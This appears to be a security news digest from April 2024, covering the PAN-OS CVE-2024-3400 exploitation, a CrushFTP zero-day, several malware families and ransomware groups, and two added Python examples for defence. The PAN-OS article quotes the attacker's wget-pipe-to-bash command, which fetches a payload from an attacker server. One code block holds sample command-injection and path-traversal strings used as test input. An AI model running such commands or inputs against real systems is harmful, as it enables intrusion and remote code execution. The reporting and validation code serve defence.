20.4.24 | Bypassing Entra ID Conditional Access Like APT: A Deep Dive Into Device Authentication Mechanisms for Building Your Own PRT Cookie | Entra ID Conditional Access is a security feature that applies the right access controls for securing Microsoft cloud infrastructure. Conditional Access takes signals from various sources into account when making access decisions. One of the major signals is Device; Conditional Access can require a device marked as compliant or a Microsoft Entra hybrid joined device for authentication. | Congress |
20.4.24 | EDR Reloaded: Erase Data Remotely | Endpoint security controls are the most essential tool for protecting computer systems from various malware threats. Most of them usually include several layers of detection modules. Among them is the byte signature detection logic, which is usually treated as the most reliable layer with the lowest false positive rate. | Congress |
20.4.24 | SystemUI As EvilPiP: The Hijacking Attacks on Modern Mobile Devices | The Android system and anti-virus industry have been struggling with UI security issues, among which Activity Hijack Attack (AHA) is one of the most powerful UI Hijack techniques. In the era of API14~26, BankBot and Spyware could launch zero-cost hijacking attacks on user devices to access sensitive credentials or runtime permissions. | Congress |
20.4.24 | Chinese APT: A Master of Exploiting Edge Devices | China-nexus actors have compromised edge devices such as firewall, VPN, IoT devices, etc. against the Taiwan Government since 2020 during COVID19, and have compromised those devices to build Botnets, spread disinformation, and exfiltrate sensitive data. However, edge devices belong to closed embedded platforms, and installing antivirus/EDR on those platforms and extracting malware are difficult. | Congress |
20.4.24 | Voice Phishing Syndicates Unmasked: An In-Depth Investigation and Exposure | In August 2022, a single voice-phishing incident in South Korea caused $4.1 billion in damages, the largest single cyber incident in the country. Voice phishing attack groups trick victims into installing a malicious app and then convince them to call law enforcement. | Congress |
20.4.24 | How to Get the Most Out of the Python Decompilers Uncompyle6 and Decompyle3 - How to Write and Read a Bytecode Decompiler | Uncompyle6 and decompyle3 are the most complete, popular, and accurate open-source Python bytecode decompilers available for the Python versions they support. The underlying cross-platform disassembler they use, xdis, is also unique. | Congress |
Palo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack
20.4.24
Vulnerability
The Hacker News
Palo Alto Networks has shared more details of a critical security flaw impacting PAN-OS that has come under active exploitation in the wild by malicious actors.
The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), as "intricate" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software.
"In the first one, the GlobalProtect service did not sufficiently validate the session ID format before storing them. This enabled the attacker to store an empty file with the attacker's chosen filename," Chandan B. N., senior director of product security at Palo Alto Networks, said.
"The second bug (trusting that the files were system-generated) used the filenames as part of a command."
It's worth noting that while neither of the issues is critical enough on its own, when chained together, they could lead to unauthenticated remote shell command execution.
Palo Alto Networks said that the threat actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage attack to achieve command execution on susceptible devices. The activity is being tracked under the name Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company's own Unit 42 threat intelligence division, this involves sending specially crafted requests containing the command to be executed, which is then run via a backdoor called UPSTYLE.
"The initial persistence mechanism set up by UTA0218 involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution," Volexity noted last week.
"The attacker used this method to deploy and execute specific commands and download reverse proxy tooling such as GOST (GO Simple Tunnel)."
Unit 42 said it has been unable to determine the commands executed via this mechanism – wget -qO- hxxp://172.233.228[.]93/policy | bash – but assessed that the cron job-based implant is likely used to carry out post-exploitation activities.
"In stage 1, the attacker sends a carefully crafted shell command instead of a valid session ID to GlobalProtect," Chandan explained. "This results in creating an empty file on the system with an embedded command as its filename, as chosen by the attacker."
"In stage 2, an unsuspecting scheduled system job that runs regularly uses the attacker-provided filename in a command. This results in the execution of the attacker-supplied command with elevated privileges."
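The two-stage chain Chandan describes, restated as a defensive example added here (not Palo Alto Networks' code): a format allowlist applied to the session ID before it is ever used as a filename, and a scheduled job that re-validates the names it finds on disk and passes them to the program as an argv list instead of splicing them into a shell string. The 32-hex-character ID format, the /tmp/session-store path and the sample values are assumptions constructed for the example.

```python
import re
import shlex
from pathlib import Path

# Assumed session-ID format (hypothetical, not PAN-OS's real format):
# exactly 32 lowercase hex characters. Anything else is rejected before it
# can become a filename.
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")

# Constructed sample inputs: one well-formed ID and values a format check must reject.
SAMPLES = {
    "well_formed": "0123456789abcdef0123456789abcdef",
    "embedded_command": "x; echo injected",
    "path_traversal": "../../etc/cron.d/job",
    "empty": "",
}


def is_valid_session_id(value: str) -> bool:
    """Allowlist check: the whole value must match the expected format."""
    return SESSION_ID_RE.fullmatch(value) is not None


def session_file_path(store_dir: str, session_id: str) -> str:
    """Stage-1 fix: only a validated ID becomes a filename, and the result
    must sit directly inside the session store."""
    if not is_valid_session_id(session_id):
        raise ValueError("session ID does not match the expected format")
    store = Path(store_dir).resolve()
    path = (store / session_id).resolve()
    if path.parent != store:
        raise ValueError("session file would land outside the store")
    return str(path)


def cleanup_command_unsafe(path: str) -> str:
    """The pattern behind the second bug: a filename spliced into a shell
    string. Returned as text only, never executed, to make the difference visible."""
    return f"rm -f {path}"


def count_unsafe_tokens(path: str) -> int:
    """How many words a shell would see in the unsafe string. A filename
    containing whitespace silently turns into extra words."""
    return len(shlex.split(cleanup_command_unsafe(path)))


def cleanup_command_safe(path: str) -> list[str]:
    """Stage-2 fix: an argv list handed straight to the program, so the
    filename is exactly one argument whatever it contains."""
    return ["rm", "-f", path]


def plan_cleanup(store_dir: str, filenames: list[str]) -> tuple[list[list[str]], list[str]]:
    """What a scheduled job should do with files it finds in the store:
    re-validate every name instead of trusting it as system-generated.
    Returns (argv lists to run, names that were rejected)."""
    commands, rejected = [], []
    for name in filenames:
        try:
            commands.append(cleanup_command_safe(session_file_path(store_dir, name)))
        except ValueError:
            rejected.append(name)
    return commands, rejected


if __name__ == "__main__":
    cmds, bad = plan_cleanup("/tmp/session-store", list(SAMPLES.values()))
    print("would run:", cmds)
    print("rejected:", bad)
```

The job never needs to know what the rejected names were meant to do: the allowlist removes the whole class of "filename as command fragment" inputs, and the argv form means that even a name that slipped through would arrive at rm as a single argument.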
While Palo Alto Networks initially noted that successful exploitation of CVE-2024-3400 required the firewall configurations for GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled, the company has since confirmed that device telemetry has no bearing on the problem.
This is based on new findings from Bishop Fox, which discovered bypasses to weaponize the flaw such that it did not require telemetry to be enabled on a device in order to infiltrate it.
The company has also expanded patches for the flaw over the last few days to cover other commonly deployed maintenance releases -
PAN-OS 10.2.9-h1
PAN-OS 10.2.8-h3
PAN-OS 10.2.7-h8
PAN-OS 10.2.6-h3
PAN-OS 10.2.5-h6
PAN-OS 10.2.4-h16
PAN-OS 10.2.3-h13
PAN-OS 10.2.2-h5
PAN-OS 10.2.1-h2
PAN-OS 10.2.0-h3
PAN-OS 11.0.4-h1
PAN-OS 11.0.4-h2
PAN-OS 11.0.3-h10
PAN-OS 11.0.2-h4
PAN-OS 11.0.1-h4
PAN-OS 11.0.0-h3
PAN-OS 11.1.2-h3
PAN-OS 11.1.1-h1
PAN-OS 11.1.0-h3
In light of the active abuse of CVE-2024-3400 and the availability of a proof-of-concept (PoC) exploit code, users are recommended to take steps to apply the hotfixes as soon as possible to safeguard against potential threats.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to secure their devices by April 19, 2024.
According to information shared by the Shadowserver Foundation, approximately 22,542 internet-exposed firewall devices are likely vulnerable to the CVE-2024-3400. A majority of the devices are in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China as of April 18, 2024.
Critical Update: CrushFTP Zero-Day Flaw Exploited in Targeted Attacks
20.4.24
Exploit
The Hacker News
Users of the CrushFTP enterprise file transfer software are being urged to update to the latest version following the discovery of a security flaw that has come under targeted exploitation in the wild.
"CrushFTP v11 versions below 11.1 have a vulnerability where users can escape their VFS and download system files," CrushFTP said in an advisory released Friday. "This has been patched in v11.1.0."
That said, customers who are operating their CrushFTP instances within a DMZ (demilitarized zone) restricted environment are protected against the attacks.
Simon Garrelou of Airbus CERT has been credited with discovering and reporting the flaw. It has yet to be assigned a CVE identifier.
Cybersecurity company CrowdStrike, in a post shared on Reddit, said it has observed an exploit for the flaw being used in the wild in a "targeted fashion."
These intrusions are said to have mainly targeted U.S. entities, with the intelligence gathering activity suspected to be politically motivated.
"CrushFTP users should continue to follow the vendor's website for the most up-to-date instructions and prioritize patching," CrowdStrike said.
BlackTech Targets Tech, Research, and Gov Sectors with New 'Deuterbear' Tool
19.4.24
Hacking
The Hacker News
Technology, research, and government sectors in the Asia-Pacific region have been targeted by a threat actor called BlackTech as part of a recent cyber attack wave.
The intrusions pave the way for an updated version of modular backdoor dubbed Waterbear as well as its enhanced successor referred to as Deuterbear.
"Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis," Trend Micro researchers Cyris Tseng and Pierre Lee said in an analysis last week.
"In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear."
The cybersecurity firm is tracking the threat actor under the moniker Earth Hundun, which is known to be active since at least 2007. It also goes by other names such as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard.
In a joint advisory published last September, cybersecurity and intelligence agencies from Japan and the U.S. attributed the adversary to China, describing its ability to modify router firmware and exploit routers' domain-trust relationships to pivot from international subsidiaries to their corporate headquarters based in the two countries.
"BlackTech actors use custom malware, dual-use tools, and living-off-the-land tactics, such as disabling logging on routers, to conceal their operations," the governments said.
"Upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network."
One of the crucial tools in its multifaceted arsenal is Waterbear (aka DBGPRINT), which has been put to use since 2009 and has been consistently updated over the years with improved defense evasion features.
The core remote access trojan is fetched from a command-and-control (C2) server by means of a downloader, which is launched using a loader that, in turn, is executed via a known technique called DLL side-loading.
The newest version of the implant supports nearly 50 commands, enabling it to perform a wide range of activities, including process enumeration and termination, file operations, window management, start and exit remote shell, screenshot capture, and Windows Registry modification, among others.
Also delivered using a similar infection flow since 2022 is Deuterbear, whose downloader implements an array of obfuscation methods to resist anti-analysis and uses HTTPS for C2 communications.
"Since 2009, Earth Hundun has continuously evolved and refined the Waterbear backdoor, as well as its many variants and branches," the researchers said.
"The Deuterbear downloader employs HTTPS encryption for network traffic protection and implements various updates in malware execution, such as altering the function decryption, checking for debuggers or sandboxes, and modifying traffic protocols."
Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers
19.4.24
Ransom
The Hacker News
Threat actors behind the Akira ransomware group have extorted approximately $42 million in illicit proceeds after breaching the networks of more than 250 victims as of January 1, 2024.
"Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol's European Cybercrime Centre (EC3), said in a joint alert.
"In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines."
The double-extortion group has been observed using a C++ variant of the locker in the early stages, before shifting to a Rust-based code as of August 2023. It's worth noting that the e-crime actor is completely different from the Akira ransomware family that was active in 2017.
Initial access to target networks is facilitated by means of exploiting known flaws in Cisco appliances (e.g., CVE-2020-3259 and CVE-2023-20269).
Alternate vectors involve the use of Remote Desktop Protocol (RDP), spear-phishing, valid credentials, and virtual private network (VPN) services lacking in multi-factor authentication (MFA) protections.
Akira actors are also known to leverage various ways to set up persistence by creating a new domain account on the compromised system, as well as evade detection by abusing the Zemana AntiMalware driver to terminate antivirus-related processes via what's called a Bring Your Own Vulnerable Driver (BYOVD) attack.
To aid in privilege escalation, the adversary relies on credential scraping tools like Mimikatz and LaZagne, while Windows RDP is utilized to move laterally within the victim's network. Data exfiltration is accomplished through FileZilla, WinRAR, WinSCP, and RClone.
"Akira ransomware encrypts targeted systems using a hybrid encryption algorithm that combines Chacha20 and RSA," Trend Micro said in an analysis of the ransomware published in October 2023.
"Additionally, the Akira ransomware binary, like most modern ransomware binaries, has a feature that allows it to inhibit system recovery by deleting shadow copies from the affected system."
Blockchain and source code data suggests that Akira ransomware group is likely affiliated with the now-defunct Conti ransomware gang. A decryptor for Akira was released by Avast last July, but it's highly likely the shortcomings have since been plugged.
Akira's mutation to target Linux enterprise environments also follows similar moves by other established ransomware families such as LockBit, Cl0p, Royal, Monti, and RTM Locker.
LockBit's Struggles to Come Back
The disclosure comes as Trend Micro revealed that the sweeping law enforcement takedown of the prolific LockBit gang earlier this February has had a significant operational and reputational impact on the group's ability to bounce back, prompting it to post old and fake victims on its new data leak site.
"LockBit was one of the most prolific and widely used RaaS strains in operation, with potentially hundreds of affiliates, including many associated with other prominent strains," Chainalysis noted in February.
The blockchain analytics firm said it uncovered cryptocurrency trails connecting a LockBit administrator to a journalist based in Sevastopol known as Colonel Cassad, who has a history of soliciting donations for Russian militia group operations in the sanctioned jurisdictions of Donetsk and Luhansk following the onset of the Russo-Ukrainian war in 2022.
It's worth pointing out that Cisco Talos, in January 2022, linked Colonel Cassad (aka Boris Rozhin) to an anti-Ukraine disinformation campaign orchestrated by the Russian state-sponsored group known as APT28.
"Following the operation, LockBitSupp [the alleged leader of LockBit] appears to be attempting to inflate the apparent victim count while also focusing on posting victims from countries whose law enforcement agencies participated in the disruption," Trend Micro said in a recent deep dive.
"This is possibly an attempt to reinforce the narrative that it would come back stronger and target those responsible for its disruption."
In an interview with Recorded Future News last month, LockBitSupp acknowledged the short-term decline in profits, but promised to improve their security measures and "work as long as my heart beats."
"Reputation and trust are key to attracting affiliates, and when these are lost, it's harder to get people to return. Operation Cronos succeeded in striking against one element of its business that was most important: its brand," Trend Micro stated.
Agenda Returns with an Updated Rust Version
The development also follows the Agenda ransomware group's (aka Qilin and Water Galura) use of an updated Rust variant to infect VMWare vCenter and ESXi servers through Remote Monitoring and Management (RMM) tools and Cobalt Strike.
"The Agenda ransomware's ability to spread to virtual machine infrastructure shows that its operators are also expanding to new targets and systems," the cybersecurity company said.
Even as a fresh crop of ransomware actors continues to energize the threat landscape, it's also becoming clearer that "crude, cheap ransomware" sold on the cybercrime underground is being put to use in real-world attacks, allowing lower-tier individual threat actors to generate significant profit without having to be a part of a well-organized group.
Interestingly, a majority of these varieties are available for a single, one-off price starting from as low as $20 for a single build, while a few others such as HardShield and RansomTuga are offered at no extra cost.
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry.
"They can target small companies and individuals, who are unlikely to have the resources to defend themselves or respond effectively to incidents, without giving anyone else a cut."
OfflRouter Malware Evades Detection in Ukraine for Almost a Decade
19.4.24
Virus
The Hacker News
Select Ukrainian government networks have remained infected with a malware called OfflRouter since 2015.
Cisco Talos said its findings are based on an analysis of over 100 confidential documents that were infected with the VBA macro virus and uploaded to the VirusTotal malware scanning platform since 2018. More than 20 such documents have been uploaded since 2022.
"The documents contained VBA code to drop and run an executable with the name 'ctrlpanel.exe,'" security researcher Vanja Svajcer said. "The virus is still active in Ukraine and is causing potentially confidential documents to be uploaded to publicly accessible document repositories."
A striking aspect of OfflRouter is its inability to spread via email, necessitating that it be propagated via other means, such as sharing documents and removable media, including USB memory sticks containing the infected documents.
"It would require manual user intervention to send an infected document as an email attachment," a Talos researcher told The Hacker News. "That could be the reason why the virus stayed under the radar for such a long time as it is not very noisy."
"We can only speculate as to why there is no automated spreading by email. That said, if the malware was attached to a document sent via email, the virus would still attempt to infect files located on removable media."
These design choices, intentional or otherwise, are said to have confined the spread of OfflRouter within Ukraine's borders and to a few organizations, thus escaping detection for almost 10 years.
It's currently not known who is responsible for the malware and there are no indications that it was developed by someone from Ukraine.
Whoever it is, they have been described as inventive yet inexperienced owing to the unusual propagation mechanism and the presence of several mistakes in the source code.
OfflRouter has been previously highlighted by MalwareHunterTeam as early as May 2018 and again by the Computer Security Incident Response Team Slovakia (CSIRT.SK) in August 2021, detailing infected documents uploaded to the National Police of Ukraine's website.
The modus operandi has remained virtually unchanged, with the VBA macro-embedded Microsoft Word documents dropping a .NET executable named "ctrlpanel.exe," which then infects all files with the .DOC (not .DOCX) extension found on the system and other removable media with the same macro.
"The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum," Svajcer said.
"If the sum is zero, the document is considered already infected."
That said, the attack becomes successful only when VBA macros are enabled. Microsoft, as of July 2022, has been blocking macros by default in Office documents downloaded from the internet, prompting threat actors to seek other initial access pathways.
While Microsoft's preventive measure limits the success of such macro-based attacks, Cisco Talos told the publication that many organizations in the affected region, including government entities, are not using up-to-date Office versions.
"The main issue we tried to raise is not that a virus is active and affects Microsoft Office, but that users can unknowingly upload confidential documents to public repositories," it said. "Users need to double check for the malware infection."
Another key function of the malware is to make Windows Registry modifications so as to ensure that the executable runs every time upon booting the system.
"The virus targets only documents with the filename extension .DOC, the default extension for the OLE2 documents, and it will not try to infect other filename extensions," Svajcer said. "The default Word document filename extension for the more recent Word versions is .DOCX, so few documents will be infected as a result."
That's not all. Ctrlpanel.exe is also equipped to search for potential plugins (with the extension .ORP) present on removable drives and execute them on the machine, which implies the malware is expecting the plugins to be delivered via USB drives or CD-ROMs.
On the contrary, if the plugins are already present on a host, OfflRouter takes care of encoding them, copying the files to the root folder of the attached removable media with the filename extension .ORP, and manipulating them to make them hidden so that they are not visible through the File Explorer when plugging them into another device.
That said, one major unknown is whether the initial vector is a document or the executable module ctrlpanel.exe.
"The advantage of the two-module virus is that it can be spread as a standalone executable or as an infected document," Svajcer said.
"It may even be advantageous to initially spread as an executable as the module can run standalone and set the registry keys to allow execution of the VBA code and changing of the default saved file formats to .DOC before infecting documents. That way, the infection may be a bit stealthier."
Hackers Target Middle East Governments with Evasive "CR4T" Backdoor
19.4.24
Virus
The Hacker News
Government entities in the Middle East have been targeted as part of a previously undocumented campaign to deliver a new backdoor dubbed CR4T.
Russian cybersecurity company Kaspersky said it discovered the activity in February 2024, with evidence suggesting that it may have been active since at least a year prior. The campaign has been codenamed DuneQuixote.
"The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code," Kaspersky said.
The starting point of the attack is a dropper, which comes in two variants -- a regular dropper that's either implemented as an executable or a DLL file and a tampered installer file for a legitimate tool named Total Commander.
Regardless of the method used, the primary function of the dropper is to extract an embedded command-and-control (C2) address that's decrypted using a novel technique to prevent the server address from being exposed to automated malware analysis tools.
Specifically, it entails obtaining the filename of the dropper and stringing it together with one of the many hard-coded snippets from Spanish poems present in the dropper code. The malware then calculates the MD5 hash of the combined string, which acts as the key to decode the C2 server address.
The dropper subsequently establishes connections with the C2 server and downloads a next-stage payload after providing a hard-coded ID as the User-Agent string in the HTTP request.
"The payload remains inaccessible for download unless the correct user agent is provided," Kaspersky said. "Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild."
The trojanized Total Commander installer, on the other hand, carries a few differences despite retaining the main functionality of the original dropper.
It does away with the Spanish poem strings and implements additional anti-analysis checks that prevent a connection to the C2 server should the system have a debugger or a monitoring tool installed, the position of the cursor does not change after a certain time, the amount of RAM available is less than 8 GB, and the disk capacity is less than 40 GB.
CR4T ("CR4T.pdb") is a C/C++-based memory-only implant that grants attackers access to a console for command line execution on the infected machine, performs file operations, and uploads and downloads files after contacting the C2 server.
Kaspersky said it also unearthed a Golang version of CR4T with identical features, in addition to possessing the ability to execute arbitrary commands and create scheduled tasks using the Go-ole library.
On top of that, the Golang CR4T backdoor is equipped to achieve persistence by utilizing the COM objects hijacking technique and leverage the Telegram API for C2 communications.
The presence of the Golang variant is an indication that the unidentified threat actors behind DuneQuixote are actively refining their tradecraft with cross-platform malware.
"The 'DuneQuixote' campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence," Kaspersky said.
"Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques."
FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor
19.4.24
APT
The Hacker News
The infamous cybercrime syndicate known as FIN7 has been linked to a spear-phishing campaign targeting the U.S. automotive industry to deliver a known backdoor called Carbanak (aka Anunak).
"FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up.
"They used the lure of a free IP scanning tool to run their well-known Anunak backdoor and gain an initial foothold utilizing living off the land binaries, scripts, and libraries (LOLBAS)."
FIN7, also known as Carbon Spider, Elbrus, Gold Niagara, ITG14, and Sangria Tempest, is a well-known financially motivated e-crime group that has a track record of striking a wide range of industry verticals to deliver malware capable of stealing information from point-of-sale (PoS) systems since 2012.
In recent years, the threat actor has transitioned to conducting ransomware operations, delivering various strains like Black Basta, Cl0p, DarkSide, and REvil. Two Ukrainian members of the group, Fedir Hladyr and Andrii Kolpakov, have been sentenced to prison in the U.S. to date.
The latest campaign discovered by BlackBerry in late 2023 starts with a spear-phishing email that embeds a booby-trapped link pointing to a bogus site ("advanced-ip-sccanner[.]com") that masquerades as Advanced IP Scanner.
"This fake site redirected to 'myipscanner[.]com,' which in turn redirected to an attacker-owned Dropbox that downloaded the malicious executable WsTaskLoad.exe onto the victim's machine," the Canadian cybersecurity company said.
The binary, for its part, initiates a multi-stage process that ultimately leads to the execution of Carbanak. It's also designed to deliver additional payloads such as POWERTRASH and establish persistence by installing OpenSSH for remote access.
It's currently not known if the threat actors were planning on deploying ransomware, as the infected system was detected early on and removed from the network before it could reach the lateral movement stage.
While the target of the attack was a "large multinational automotive manufacturer" based in the U.S., BlackBerry said it found several similar malicious domains on the same provider, indicating that it may be part of a wider campaign by FIN7.
To mitigate the risks posed by such threats, it's recommended that organizations be on the lookout for phishing attempts, enable multi-factor authentication (MFA), keep all software and systems up-to-date, and monitor for unusual login attempts.
New Android Trojan 'SoumniBot' Evades Detection with Clever Tricks
18.4.24
OS
The Hacker News
A new Android trojan called SoumniBot has been detected in the wild targeting users in South Korea by leveraging weaknesses in the manifest extraction and parsing procedure.
The malware is "notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest," Kaspersky researcher Dmitry Kalinin said in a technical analysis.
Every Android app comes with a manifest XML file ("AndroidManifest.xml") that's located in the root directory and declares the various components of the app, as well as the permissions and the hardware and software features it requires.
Knowing that threat hunters typically commence their analysis by inspecting the app's manifest file to determine its behavior, the threat actors behind the malware have been found to leverage three different techniques to resist analysis.
The first method involves the use of an invalid Compression method value when unpacking the APK's manifest file using the libziparchive library, which treats any value other than 0x0000 or 0x0008 as uncompressed.
"This allows app developers to put any value except 8 into the Compression method and write uncompressed data," Kalinin explained.
"Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed."
It's worth pointing out here that the method has been adopted by threat actors associated with several Android banking trojans since April 2023.
Secondly, SoumniBot misrepresents the archived manifest file size, providing a value that exceeds the actual figure, as a result of which the "uncompressed" file is directly copied, with the manifest parser ignoring the rest of the "overlay" data that takes up the rest of the available space.
"Stricter manifest parsers wouldn't be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors," Kalinin said.
The final technique has to do with utilizing long XML namespace names in the manifest file, thus making it difficult for analysis tools to allocate enough memory to process them. That said, the manifest parser is designed to ignore namespaces, and, as a result, no errors are raised when handling the file.
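A check for the first two manifest tricks, added here as an example (not Kaspersky's or Android's code): it walks the ZIP central directory of a constructed stand-in APK, flags a compression method outside {0, 8} and a declared entry size that overruns the next entry, and contrasts that with Python's own strict zipfile, which refuses the tampered entry much as the "stricter manifest parsers" above would. The MANIFEST bytes and the archive are constructed for the example; the long-namespace trick lives inside the binary XML and is not covered.

```python
import io
import struct
import zipfile
from dataclasses import dataclass

# Methods the Android parser treats as meaningful (0 = stored, 8 = deflate).
# Per the analysis, libziparchive treats any other value as uncompressed,
# while stricter unpackers reject the entry outright.
STANDARD_METHODS = {0, 8}

CD_SIG, LOCAL_SIG, EOCD_SIG = b"PK\x01\x02", b"PK\x03\x04", b"PK\x05\x06"

# Constructed stand-in for an APK: a ZIP with a stored manifest and a deflated
# "dex" entry. Not a real app; the manifest text is a placeholder.
MANIFEST = b'<?xml version="1.0"?><manifest package="com.example.sample"/>'


@dataclass
class Entry:
    cd_offset: int      # offset of this central-directory header
    name: str
    method: int
    comp_size: int
    uncomp_size: int
    local_offset: int   # offset of the matching local file header


def central_directory(data: bytes) -> tuple[list[Entry], int]:
    """Parse the central directory; return its entries and its start offset."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    n_entries, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_offset
    for _ in range(n_entries):
        if data[pos:pos + 4] != CD_SIG:
            raise ValueError(f"bad central directory signature at {pos}")
        (method, comp, uncomp, name_len, extra_len, comment_len,
         local_offset) = struct.unpack_from("<H8xIIHHH8xI", data, pos + 10)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        entries.append(Entry(pos, name, method, comp, uncomp, local_offset))
        pos += 46 + name_len + extra_len + comment_len
    return entries, cd_offset


def audit_apk(data: bytes) -> list[str]:
    """Flag the two header-level tricks: a non-standard compression method and
    a declared size that overruns the next entry (or the central directory)."""
    entries, cd_offset = central_directory(data)
    boundaries = sorted(e.local_offset for e in entries) + [cd_offset]
    findings = []
    for e in entries:
        if e.method not in STANDARD_METHODS:
            findings.append(f"{e.name}: non-standard compression method {e.method:#06x}")
        if e.method == 0 and e.comp_size != e.uncomp_size:
            findings.append(f"{e.name}: stored entry with mismatched sizes")
        if data[e.local_offset:e.local_offset + 4] != LOCAL_SIG:
            findings.append(f"{e.name}: local header signature missing")
            continue
        local_method, name_len, extra_len = struct.unpack_from("<H16xHH", data, e.local_offset + 8)
        if local_method != e.method:
            findings.append(f"{e.name}: local/central compression method mismatch")
        data_end = e.local_offset + 30 + name_len + extra_len + e.comp_size
        next_boundary = min(b for b in boundaries if b > e.local_offset)
        if data_end > next_boundary:
            findings.append(f"{e.name}: declared size overruns the next entry by {data_end - next_boundary} bytes")
    return findings


def strict_unpack_ok(data: bytes) -> bool:
    """What a strict unpacker does with the same bytes: zipfile refuses the entry."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read("AndroidManifest.xml")
        return True
    except Exception:
        return False


def build_sample_apk() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", MANIFEST, compress_type=zipfile.ZIP_STORED)
        zf.writestr("classes.dex", b"dex\n035\x00" + bytes(64), compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def build_tampered_apk() -> bytes:
    """Apply the two header tricks to the sample so the audit has something to catch."""
    data = bytearray(build_sample_apk())
    entries, _ = central_directory(bytes(data))
    for e in entries:
        if e.name == "AndroidManifest.xml":
            struct.pack_into("<H", data, e.cd_offset + 10, 0x0009)      # bogus method
            struct.pack_into("<H", data, e.local_offset + 8, 0x0009)
            struct.pack_into("<I", data, e.cd_offset + 20, e.uncomp_size + 4096)  # inflated size
    return bytes(data)


if __name__ == "__main__":
    for label, apk in (("clean", build_sample_apk()), ("tampered", build_tampered_apk())):
        print(label, audit_apk(apk), "strict unpack ok:", strict_unpack_ok(apk))
```

The audit reads the central directory rather than the local headers because that is what installers and most unpackers consult first; comparing the two and bounding each entry by its neighbour's offset is what turns "the parser happens to accept it" into a reportable finding.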
SoumniBot, once launched, requests its configuration information from a hard-coded server address to obtain the servers used to send the collected data and receive commands using the MQTT messaging protocol, respectively.
It's designed to launch a malicious service that restarts every 16 minutes if it terminates for some reason, and uploads the information every 15 seconds. This includes device metadata, contact lists, SMS messages, photos, videos, and a list of installed apps.
The malware is also capable of adding and deleting contacts, sending SMS messages, toggling silent mode, and enabling Android's debug mode, not to mention hiding the app icon to make it difficult to uninstall from the device.
One noteworthy feature of SoumniBot is its ability to search the external storage media for .key and .der files containing paths to "/NPKI/yessign," which refers to the digital signature certificate service offered by South Korea for governments (GPKI), banks, and online stock exchanges (NPKI).
"These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions," Kalinin said. "This technique is quite uncommon for Android banking malware."
Earlier this year, cybersecurity company S2W revealed details of a malware campaign undertaken by the North Korea-linked Kimsuky group that made use of a Golang-based information stealer called Troll Stealer to siphon GPKI certificates from Windows systems.
"Malware creators seek to maximize the number of devices they infect without being noticed," Kalinin concluded. "This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code."
Global Police Operation Disrupts 'LabHost' Phishing Service, Over 30 Arrested Worldwide
18.4.24
Phishing
The Hacker News
As many as 37 individuals have been arrested as part of an international crackdown on a cybercrime service called LabHost that has been used by criminal actors to steal personal credentials from victims around the world.
Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost offered phishing pages targeting banks, high-profile organizations, and other service providers located primarily in Canada, the U.S., and the U.K.
As part of the operation, codenamed Nebulae, two LabHost users from Melbourne and Adelaide were arrested on April 17, with three others arrested and charged with drug-related offenses.
"Australian offenders are allegedly among 10,000 cybercriminals globally who have used the platform, known as LabHost, to trick victims into providing their personal information, such as online banking logins, credit card details and passwords, through persistent phishing attacks sent via texts and emails," the Australian Federal Police (AFP) said in a statement.
The Europol-led coordinated effort also witnessed 32 other individuals being apprehended between April 14 and 17, including four in the U.K. who are allegedly responsible for developing and running the service. In total, 70 addresses were searched across the world.
Coinciding with the arrests, LabHost ("lab-host[.]ru") and all its associated cluster of phishing sites have been confiscated and replaced with a message announcing their seizure.
